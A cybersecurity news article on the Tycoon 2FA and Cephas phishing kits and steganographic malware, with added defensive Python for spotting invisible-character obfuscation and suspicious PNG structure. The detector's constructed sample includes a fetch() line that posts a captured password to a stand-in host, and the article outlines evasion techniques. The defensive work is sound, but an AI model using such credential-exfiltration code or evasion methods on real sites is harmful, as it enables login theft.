SecurityBrief UK - Technology news for CISOs & cybersecurity decision-makers

Phishing kits & steganography drive new wave of email threats

Fri, 14th Nov 2025

Cybersecurity researchers have observed a surge in sophisticated email-based threats targeting organisations, with the return of a well-known phishing kit and the emergence of new obfuscation techniques. Recent developments include updates to the 'Tycoon 2FA' phishing kit, the growing use of image-based malware concealment, and the detection of a new kit dubbed 'Cephas'.

Phishing kit evolution

The Tycoon 2FA phishing kit, active since August 2023, has undergone significant updates to increase its effectiveness in harvesting login details from business users of Microsoft 365 and Google Workspace. The operators have integrated a range of new methods intended to bypass traditional security tools.

New features include the deployment of CAPTCHA challenges designed to frustrate automated security defences and enhance the appearance of legitimacy for victims. Tycoon now presents more realistic URLs, mimicking OAuth2-style login flows with unique codes to avoid detection. In addition, the phishing pages utilise LZString compression to shrink and obscure large sections of code, which remains hidden until the webpage is fully loaded in a browser. This dynamic execution further complicates detection by security systems.

"Phishing kits are constantly evolving and evading detection, making it critical for organisations to stay vigilant and implement measures to protect their data," said Barracuda.

Cephas kit obfuscation

Analysts have spotted the emergence of the Cephas phishing kit, notable for its use of an unconventional code obfuscation technique. Cephas embeds random invisible characters within its source code, so that conventional anti-phishing scanners and YARA rules, which match on the raw bytes, no longer see the strings they are looking for. Comments within the Cephas code often reference astronomical and biblical themes, but researchers highlight its technical innovation in bypassing content filtering. The kit first appeared in August 2024 and is becoming more widely adopted among threat actors.
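The invisible-character trick works because a signature engine compares bytes, and a zero-width code point between "pass" and "word" means the literal "password" never occurs. The defensive counter is to normalise the text (strip format and filler characters) before matching, and to treat a high density of such characters as a signal in its own right. The script below is an added illustration written for this article, not code from Barracuda or from the Cephas kit; the HTML sample is constructed, and the plain substring patterns stand in for the strings section of a YARA rule.

```python
import unicodedata

# Zero-width filler code points whose Unicode category is not "Cf", so the
# category test alone would miss them (Hangul fillers, combining grapheme joiner).
EXTRA_INVISIBLE = {0x034F, 0x115F, 0x1160, 0x3164, 0xFFA0}

# Constructed phishing-page fragment with zero-width characters spliced into the
# strings a scanner would key on (U+200B/C/D, U+2060). Not real kit code.
SAMPLE = (
    '<input type="p\u200bass\u200cword" name="pw\u2060d">\n'
    '<script>var u = "https://log\u200bin-veri\u200dfy.example/post.php";'
    ' fetch(u, {method: "POST", body: document.forms[0].pw\u200bd.value});</script>\n'
)

# Stand-ins for YARA rule strings (plain substring matching for the demonstration).
PATTERNS = ["password", "login-verify.example", "fetch("]


def is_invisible(ch: str) -> bool:
    """True for Unicode format characters (ZWSP, ZWJ, word joiner, BOM, bidi
    controls, soft hyphen ...) and a few filler characters that render as nothing."""
    return unicodedata.category(ch) == "Cf" or ord(ch) in EXTRA_INVISIBLE


def find_invisible(text: str) -> list:
    """Return (offset, 'U+XXXX') for every invisible code point, for analyst review."""
    return [(i, f"U+{ord(c):04X}") for i, c in enumerate(text) if is_invisible(c)]


def strip_invisible(text: str) -> str:
    """Normalised view of the text: what the browser effectively renders and runs."""
    return "".join(c for c in text if not is_invisible(c))


def scan(text: str, patterns: list) -> dict:
    """Match patterns against both the raw and the normalised text.

    A pattern that matches only after normalisation, together with a non-zero
    count of invisible characters, is the signature of this evasion technique.
    """
    raw_hits = {p: text.count(p) for p in patterns}
    clean = strip_invisible(text)
    normalized_hits = {p: clean.count(p) for p in patterns}
    hidden = find_invisible(text)
    return {
        "raw": raw_hits,
        "normalized": normalized_hits,
        "invisible_count": len(hidden),
        "invisible_ratio": len(hidden) / max(len(text), 1),
        "evasion_suspected": bool(hidden)
        and any(normalized_hits[p] > raw_hits[p] for p in patterns),
    }


if __name__ == "__main__":
    result = scan(SAMPLE, PATTERNS)
    for p in PATTERNS:
        print(f"{p!r}: raw={result['raw'][p]} normalized={result['normalized'][p]}")
    print("invisible characters:", find_invisible(SAMPLE))
    print("evasion suspected:", result["evasion_suspected"])
```

Alert on the combination (matches that appear only after normalisation, plus an unusual count of invisible characters) rather than on mere presence: a BOM at the start of a file, zero-width joiners inside emoji sequences and bidi marks in Arabic or Hebrew content are all legitimate, so a blanket "any Cf character" rule would be noisy. Feeding the normalised text to the existing YARA rules is the lower-friction fix, since the rules themselves do not have to change.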

Steganography tactics

In recent weeks, researchers have identified a rise in steganography-based attacks, a technique that conceals malware within image files. These attacks typically begin with a phishing email disguised as a business inquiry, prompting recipients to download files through legitimate file-sharing platforms. The downloaded files are heavily obfuscated JavaScript. When executed, the script uses Windows PowerShell to download a PNG image harbouring hidden malware payloads.

The malicious software is engineered to evade detection by running in memory, disguising process names, and avoiding file writes to disk. Attackers exploit trusted cloud services to deliver components and encode malware in such a manner that standard security systems do not easily flag the content. This approach reflects advanced tactics previously associated with advanced persistent threat (APT) groups.
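An image that carries a payload usually still has to be a valid image, so one cheap triage step for a PNG fetched by a script is a structural check: walk the chunk list and look for data after the IEND chunk, chunk types the PNG specification does not define, or CRC mismatches, none of which a clean image produced by an ordinary encoder would show. The checker below is an added example written for this article, not the researchers' tooling; the PNG samples it inspects are constructed in the script, and the article does not say which hiding method the observed campaign used, so this is one common heuristic rather than a description of that campaign.

```python
import struct
import zlib

PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"

# Chunk types defined by the PNG specification; anything else is a private or
# unknown chunk that a carrier image from a normal encoder has no reason to contain.
STANDARD_CHUNKS = {
    b"IHDR", b"PLTE", b"IDAT", b"IEND", b"tRNS", b"cHRM", b"gAMA", b"iCCP",
    b"sBIT", b"sRGB", b"tEXt", b"zTXt", b"iTXt", b"bKGD", b"hIST", b"pHYs",
    b"sPLT", b"tIME", b"eXIf",
}


def _chunk(ctype: bytes, body: bytes) -> bytes:
    """Serialise one PNG chunk: length, type, data, CRC-32 over type + data."""
    return struct.pack(">I", len(body)) + ctype + body + struct.pack(">I", zlib.crc32(ctype + body))


def build_png(width: int = 2, height: int = 2, extra_chunks=()) -> bytes:
    """Build a minimal valid 8-bit greyscale PNG (constructed sample, not a capture).

    extra_chunks is an iterable of (type, body) pairs inserted before IDAT, used
    here to fabricate a carrier with a private chunk.
    """
    ihdr = struct.pack(">IIBBBBB", width, height, 8, 0, 0, 0, 0)
    # Each scanline is a filter byte (0 = none) followed by one byte per pixel.
    raw = b"".join(b"\x00" + b"\x80" * width for _ in range(height))
    png = PNG_SIGNATURE + _chunk(b"IHDR", ihdr)
    for ctype, body in extra_chunks:
        png += _chunk(ctype, body)
    return png + _chunk(b"IDAT", zlib.compress(raw)) + _chunk(b"IEND", b"")


def inspect_png(data: bytes) -> dict:
    """Walk the chunk list and report structural anomalies."""
    report = {
        "valid_signature": data.startswith(PNG_SIGNATURE),
        "chunks": [], "unknown_chunks": [], "bad_crc": [],
        "trailing_bytes": 0, "truncated": False, "has_iend": False,
    }
    if not report["valid_signature"]:
        return report
    pos = len(PNG_SIGNATURE)
    while pos + 8 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        body = data[pos + 8:pos + 8 + length]
        crc_field = data[pos + 8 + length:pos + 12 + length]
        if len(body) < length or len(crc_field) < 4:
            report["truncated"] = True
            break
        name = ctype.decode("latin-1")
        report["chunks"].append(name)
        if ctype not in STANDARD_CHUNKS:
            report["unknown_chunks"].append(name)
        if struct.unpack(">I", crc_field)[0] != zlib.crc32(ctype + body):
            report["bad_crc"].append(name)
        pos += 12 + length
        if ctype == b"IEND":
            report["has_iend"] = True
            # Viewers stop at IEND, so bytes after it are invisible to the user
            # but trivially reachable for a script that reads the file.
            report["trailing_bytes"] = len(data) - pos
            break
    return report


def is_suspicious(report: dict) -> bool:
    """Flag images that carry structure an ordinary PNG has no need for."""
    return bool(
        not report["valid_signature"] or not report["has_iend"]
        or report["trailing_bytes"] or report["unknown_chunks"]
        or report["bad_crc"] or report["truncated"]
    )


if __name__ == "__main__":
    clean = build_png()
    appended = clean + b"constructed appended payload"
    private = build_png(extra_chunks=[(b"prIV", b"constructed hidden blob")])
    for label, sample in (("clean", clean), ("appended", appended), ("private chunk", private)):
        rep = inspect_png(sample)
        print(f"{label}: suspicious={is_suspicious(rep)} trailing={rep['trailing_bytes']} unknown={rep['unknown_chunks']}")
```

This catches the appended-blob and private-chunk variants only. A payload spread across pixel least-significant bits leaves the file structurally perfect, which is why the controls the article goes on to recommend (limiting allowed file types so the JavaScript dropper never runs, and watching for PowerShell fetching images from unknown domains) matter more than inspecting the image itself.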

Security researchers advise organisations to enforce security policies such as blocking macros in documents, limiting allowed file types, and monitoring for unusual outbound traffic or unknown domains. Layered security solutions that use behavioural analysis, AI-driven detection, and adaptive authentication are recommended to help defend against evolving threats.

"Everyday email threats are now using advanced and subtle techniques previously mainly associated with apex attackers like advanced persistent threats (APTs)," said Barracuda.